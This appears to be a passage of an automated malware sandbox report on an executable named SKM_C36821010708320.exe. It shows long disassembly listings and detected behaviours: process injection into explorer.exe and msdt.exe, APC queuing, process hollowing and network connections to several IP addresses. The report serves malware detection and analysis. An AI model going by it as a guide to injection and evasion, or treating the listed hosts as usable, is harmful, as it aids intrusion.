Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FE7D50 mov eax, dword ptr fs:[00000030h]	6_2_04FE7D50
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF4D3B mov eax, dword ptr fs:[00000030h]	6_2_04FF4D3B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF4D3B mov eax, dword ptr fs:[00000030h]	6_2_04FF4D3B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF4D3B mov eax, dword ptr fs:[00000030h]	6_2_04FF4D3B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]	6_2_04FD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]	6_2_04FD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]	6_2_04FD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]	6_2_04FD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]	6_2_04FD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]	6_2_04FD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]	6_2_04FD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]	6_2_04FD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]	6_2_04FD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]	6_2_04FD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]	6_2_04FD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]	6_2_04FD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]	6_2_04FD3D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FCAD30 mov eax, dword ptr fs:[00000030h]	6_2_04FCAD30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05098CD6 mov eax, dword ptr fs:[00000030h]	6_2_05098CD6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050814FB mov eax, dword ptr fs:[00000030h]	6_2_050814FB
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05046CF0 mov eax, dword ptr fs:[00000030h]	6_2_05046CF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05046CF0 mov eax, dword ptr fs:[00000030h]	6_2_05046CF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05046CF0 mov eax, dword ptr fs:[00000030h]	6_2_05046CF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0509070D mov eax, dword ptr fs:[00000030h]	6_2_0509070D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0509070D mov eax, dword ptr fs:[00000030h]	6_2_0509070D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0505FF10 mov eax, dword ptr fs:[00000030h]	6_2_0505FF10
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0505FF10 mov eax, dword ptr fs:[00000030h]	6_2_0505FF10
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF16E0 mov ecx, dword ptr fs:[00000030h]	6_2_04FF16E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD76E2 mov eax, dword ptr fs:[00000030h]	6_2_04FD76E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF36CC mov eax, dword ptr fs:[00000030h]	6_2_04FF36CC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05098F6A mov eax, dword ptr fs:[00000030h]	6_2_05098F6A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FEAE73 mov eax, dword ptr fs:[00000030h]	6_2_04FEAE73
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FEAE73 mov eax, dword ptr fs:[00000030h]	6_2_04FEAE73
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FEAE73 mov eax, dword ptr fs:[00000030h]	6_2_04FEAE73
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FEAE73 mov eax, dword ptr fs:[00000030h]	6_2_04FEAE73
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FEAE73 mov eax, dword ptr fs:[00000030h]	6_2_04FEAE73
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD766D mov eax, dword ptr fs:[00000030h]	6_2_04FD766D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05047794 mov eax, dword ptr fs:[00000030h]	6_2_05047794
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05047794 mov eax, dword ptr fs:[00000030h]	6_2_05047794
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05047794 mov eax, dword ptr fs:[00000030h]	6_2_05047794
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD7E41 mov eax, dword ptr fs:[00000030h]	6_2_04FD7E41
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD7E41 mov eax, dword ptr fs:[00000030h]	6_2_04FD7E41
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD7E41 mov eax, dword ptr fs:[00000030h]	6_2_04FD7E41
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD7E41 mov eax, dword ptr fs:[00000030h]	6_2_04FD7E41
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD7E41 mov eax, dword ptr fs:[00000030h]	6_2_04FD7E41
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD7E41 mov eax, dword ptr fs:[00000030h]	6_2_04FD7E41
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FCE620 mov eax, dword ptr fs:[00000030h]	6_2_04FCE620
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FFA61C mov eax, dword ptr fs:[00000030h]	6_2_04FFA61C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FFA61C mov eax, dword ptr fs:[00000030h]	6_2_04FFA61C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050037F5 mov eax, dword ptr fs:[00000030h]	6_2_050037F5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FCC600 mov eax, dword ptr fs:[00000030h]	6_2_04FCC600
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FCC600 mov eax, dword ptr fs:[00000030h]	6_2_04FCC600
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FCC600 mov eax, dword ptr fs:[00000030h]	6_2_04FCC600
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF8E00 mov eax, dword ptr fs:[00000030h]	6_2_04FF8E00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05081608 mov eax, dword ptr fs:[00000030h]	6_2_05081608
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0507FE3F mov eax, dword ptr fs:[00000030h]	6_2_0507FE3F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0508AE44 mov eax, dword ptr fs:[00000030h]	6_2_0508AE44
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0508AE44 mov eax, dword ptr fs:[00000030h]	6_2_0508AE44
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD8794 mov eax, dword ptr fs:[00000030h]	6_2_04FD8794
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0505FE87 mov eax, dword ptr fs:[00000030h]	6_2_0505FE87
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FDFF60 mov eax, dword ptr fs:[00000030h]	6_2_04FDFF60
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050446A7 mov eax, dword ptr fs:[00000030h]	6_2_050446A7
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05090EA5 mov eax, dword ptr fs:[00000030h]	6_2_05090EA5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05090EA5 mov eax, dword ptr fs:[00000030h]	6_2_05090EA5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05090EA5 mov eax, dword ptr fs:[00000030h]	6_2_05090EA5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FDEF40 mov eax, dword ptr fs:[00000030h]	6_2_04FDEF40
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0507FEC0 mov eax, dword ptr fs:[00000030h]	6_2_0507FEC0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05008EC7 mov eax, dword ptr fs:[00000030h]	6_2_05008EC7
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FFE730 mov eax, dword ptr fs:[00000030h]	6_2_04FFE730
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC4F2E mov eax, dword ptr fs:[00000030h]	6_2_04FC4F2E
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC4F2E mov eax, dword ptr fs:[00000030h]	6_2_04FC4F2E
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05098ED6 mov eax, dword ptr fs:[00000030h]	6_2_05098ED6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FEF716 mov eax, dword ptr fs:[00000030h]	6_2_04FEF716
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FFA70E mov eax, dword ptr fs:[00000030h]	6_2_04FFA70E
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FFA70E mov eax, dword ptr fs:[00000030h]	6_2_04FFA70E
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC58EC mov eax, dword ptr fs:[00000030h]	6_2_04FC58EC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FFF0BF mov ecx, dword ptr fs:[00000030h]	6_2_04FFF0BF
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FFF0BF mov eax, dword ptr fs:[00000030h]	6_2_04FFF0BF
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FFF0BF mov eax, dword ptr fs:[00000030h]	6_2_04FFF0BF
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF20A0 mov eax, dword ptr fs:[00000030h]	6_2_04FF20A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF20A0 mov eax, dword ptr fs:[00000030h]	6_2_04FF20A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF20A0 mov eax, dword ptr fs:[00000030h]	6_2_04FF20A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF20A0 mov eax, dword ptr fs:[00000030h]	6_2_04FF20A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF20A0 mov eax, dword ptr fs:[00000030h]	6_2_04FF20A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF20A0 mov eax, dword ptr fs:[00000030h]	6_2_04FF20A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC9080 mov eax, dword ptr fs:[00000030h]	6_2_04FC9080
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050469A6 mov eax, dword ptr fs:[00000030h]	6_2_050469A6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FE0050 mov eax, dword ptr fs:[00000030h]	6_2_04FE0050
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FE0050 mov eax, dword ptr fs:[00000030h]	6_2_04FE0050
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050451BE mov eax, dword ptr fs:[00000030h]	6_2_050451BE
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050451BE mov eax, dword ptr fs:[00000030h]	6_2_050451BE
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050451BE mov eax, dword ptr fs:[00000030h]	6_2_050451BE
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050451BE mov eax, dword ptr fs:[00000030h]	6_2_050451BE
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF002D mov eax, dword ptr fs:[00000030h]	6_2_04FF002D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF002D mov eax, dword ptr fs:[00000030h]	6_2_04FF002D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF002D mov eax, dword ptr fs:[00000030h]	6_2_04FF002D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF002D mov eax, dword ptr fs:[00000030h]	6_2_04FF002D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF002D mov eax, dword ptr fs:[00000030h]	6_2_04FF002D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FDB02A mov eax, dword ptr fs:[00000030h]	6_2_04FDB02A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FDB02A mov eax, dword ptr fs:[00000030h]	6_2_04FDB02A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FDB02A mov eax, dword ptr fs:[00000030h]	6_2_04FDB02A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FDB02A mov eax, dword ptr fs:[00000030h]	6_2_04FDB02A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050541E8 mov eax, dword ptr fs:[00000030h]	6_2_050541E8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05047016 mov eax, dword ptr fs:[00000030h]	6_2_05047016
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05047016 mov eax, dword ptr fs:[00000030h]	6_2_05047016
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05047016 mov eax, dword ptr fs:[00000030h]	6_2_05047016
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05094015 mov eax, dword ptr fs:[00000030h]	6_2_05094015
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05094015 mov eax, dword ptr fs:[00000030h]	6_2_05094015
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FCB1E1 mov eax, dword ptr fs:[00000030h]	6_2_04FCB1E1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FCB1E1 mov eax, dword ptr fs:[00000030h]	6_2_04FCB1E1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FCB1E1 mov eax, dword ptr fs:[00000030h]	6_2_04FCB1E1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF61A0 mov eax, dword ptr fs:[00000030h]	6_2_04FF61A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF61A0 mov eax, dword ptr fs:[00000030h]	6_2_04FF61A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF2990 mov eax, dword ptr fs:[00000030h]	6_2_04FF2990
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FFA185 mov eax, dword ptr fs:[00000030h]	6_2_04FFA185
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05082073 mov eax, dword ptr fs:[00000030h]	6_2_05082073
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FEC182 mov eax, dword ptr fs:[00000030h]	6_2_04FEC182
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05091074 mov eax, dword ptr fs:[00000030h]	6_2_05091074
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05043884 mov eax, dword ptr fs:[00000030h]	6_2_05043884
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05043884 mov eax, dword ptr fs:[00000030h]	6_2_05043884
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FCB171 mov eax, dword ptr fs:[00000030h]	6_2_04FCB171
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FCB171 mov eax, dword ptr fs:[00000030h]	6_2_04FCB171
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FCC962 mov eax, dword ptr fs:[00000030h]	6_2_04FCC962
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050090AF mov eax, dword ptr fs:[00000030h]	6_2_050090AF
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FEB944 mov eax, dword ptr fs:[00000030h]	6_2_04FEB944
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FEB944 mov eax, dword ptr fs:[00000030h]	6_2_04FEB944
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF513A mov eax, dword ptr fs:[00000030h]	6_2_04FF513A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF513A mov eax, dword ptr fs:[00000030h]	6_2_04FF513A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0505B8D0 mov eax, dword ptr fs:[00000030h]	6_2_0505B8D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0505B8D0 mov ecx, dword ptr fs:[00000030h]	6_2_0505B8D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0505B8D0 mov eax, dword ptr fs:[00000030h]	6_2_0505B8D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0505B8D0 mov eax, dword ptr fs:[00000030h]	6_2_0505B8D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0505B8D0 mov eax, dword ptr fs:[00000030h]	6_2_0505B8D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0505B8D0 mov eax, dword ptr fs:[00000030h]	6_2_0505B8D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FE4120 mov eax, dword ptr fs:[00000030h]	6_2_04FE4120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FE4120 mov eax, dword ptr fs:[00000030h]	6_2_04FE4120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FE4120 mov eax, dword ptr fs:[00000030h]	6_2_04FE4120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FE4120 mov eax, dword ptr fs:[00000030h]	6_2_04FE4120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FE4120 mov ecx, dword ptr fs:[00000030h]	6_2_04FE4120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC9100 mov eax, dword ptr fs:[00000030h]	6_2_04FC9100
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC9100 mov eax, dword ptr fs:[00000030h]	6_2_04FC9100
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC9100 mov eax, dword ptr fs:[00000030h]	6_2_04FC9100
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0508131B mov eax, dword ptr fs:[00000030h]	6_2_0508131B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF2AE4 mov eax, dword ptr fs:[00000030h]	6_2_04FF2AE4
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF2ACB mov eax, dword ptr fs:[00000030h]	6_2_04FF2ACB
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FDAAB0 mov eax, dword ptr fs:[00000030h]	6_2_04FDAAB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FDAAB0 mov eax, dword ptr fs:[00000030h]	6_2_04FDAAB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FFFAB0 mov eax, dword ptr fs:[00000030h]	6_2_04FFFAB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05098B58 mov eax, dword ptr fs:[00000030h]	6_2_05098B58
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC52A5 mov eax, dword ptr fs:[00000030h]	6_2_04FC52A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC52A5 mov eax, dword ptr fs:[00000030h]	6_2_04FC52A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC52A5 mov eax, dword ptr fs:[00000030h]	6_2_04FC52A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC52A5 mov eax, dword ptr fs:[00000030h]	6_2_04FC52A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC52A5 mov eax, dword ptr fs:[00000030h]	6_2_04FC52A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FFD294 mov eax, dword ptr fs:[00000030h]	6_2_04FFD294
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FFD294 mov eax, dword ptr fs:[00000030h]	6_2_04FFD294
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0508138A mov eax, dword ptr fs:[00000030h]	6_2_0508138A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0507D380 mov ecx, dword ptr fs:[00000030h]	6_2_0507D380
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05095BA5 mov eax, dword ptr fs:[00000030h]	6_2_05095BA5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC9240 mov eax, dword ptr fs:[00000030h]	6_2_04FC9240
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC9240 mov eax, dword ptr fs:[00000030h]	6_2_04FC9240
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC9240 mov eax, dword ptr fs:[00000030h]	6_2_04FC9240
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC9240 mov eax, dword ptr fs:[00000030h]	6_2_04FC9240
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050453CA mov eax, dword ptr fs:[00000030h]	6_2_050453CA
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050453CA mov eax, dword ptr fs:[00000030h]	6_2_050453CA
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FE3A1C mov eax, dword ptr fs:[00000030h]	6_2_04FE3A1C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FCAA16 mov eax, dword ptr fs:[00000030h]	6_2_04FCAA16
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FCAA16 mov eax, dword ptr fs:[00000030h]	6_2_04FCAA16
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC5210 mov eax, dword ptr fs:[00000030h]	6_2_04FC5210
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC5210 mov ecx, dword ptr fs:[00000030h]	6_2_04FC5210
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC5210 mov eax, dword ptr fs:[00000030h]	6_2_04FC5210
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC5210 mov eax, dword ptr fs:[00000030h]	6_2_04FC5210
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD8A0A mov eax, dword ptr fs:[00000030h]	6_2_04FD8A0A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FEDBE9 mov eax, dword ptr fs:[00000030h]	6_2_04FEDBE9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF03E2 mov eax, dword ptr fs:[00000030h]	6_2_04FF03E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF03E2 mov eax, dword ptr fs:[00000030h]	6_2_04FF03E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF03E2 mov eax, dword ptr fs:[00000030h]	6_2_04FF03E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF03E2 mov eax, dword ptr fs:[00000030h]	6_2_04FF03E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF03E2 mov eax, dword ptr fs:[00000030h]	6_2_04FF03E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF03E2 mov eax, dword ptr fs:[00000030h]	6_2_04FF03E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05004A2C mov eax, dword ptr fs:[00000030h]	6_2_05004A2C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05004A2C mov eax, dword ptr fs:[00000030h]	6_2_05004A2C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF4BAD mov eax, dword ptr fs:[00000030h]	6_2_04FF4BAD
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF4BAD mov eax, dword ptr fs:[00000030h]	6_2_04FF4BAD
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF4BAD mov eax, dword ptr fs:[00000030h]	6_2_04FF4BAD
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05054257 mov eax, dword ptr fs:[00000030h]	6_2_05054257
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0508EA55 mov eax, dword ptr fs:[00000030h]	6_2_0508EA55
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0507B260 mov eax, dword ptr fs:[00000030h]	6_2_0507B260
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0507B260 mov eax, dword ptr fs:[00000030h]	6_2_0507B260
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF2397 mov eax, dword ptr fs:[00000030h]	6_2_04FF2397
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05098A62 mov eax, dword ptr fs:[00000030h]	6_2_05098A62
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FFB390 mov eax, dword ptr fs:[00000030h]	6_2_04FFB390
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD1B8F mov eax, dword ptr fs:[00000030h]	6_2_04FD1B8F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD1B8F mov eax, dword ptr fs:[00000030h]	6_2_04FD1B8F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0500927A mov eax, dword ptr fs:[00000030h]	6_2_0500927A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF3B7A mov eax, dword ptr fs:[00000030h]	6_2_04FF3B7A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF3B7A mov eax, dword ptr fs:[00000030h]	6_2_04FF3B7A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FCDB60 mov ecx, dword ptr fs:[00000030h]	6_2_04FCDB60
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FCF358 mov eax, dword ptr fs:[00000030h]	6_2_04FCF358
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FCDB40 mov eax, dword ptr fs:[00000030h]	6_2_04FCDB40

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 118.27.99.91 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 52.128.23.153 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.29.215.252 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 69.30.217.211 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe

Memory written: C:\Users\user\Desktop\SKM_C36821010708320.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Thread register set: target process: 3388			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Thread register set: target process: 3388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe
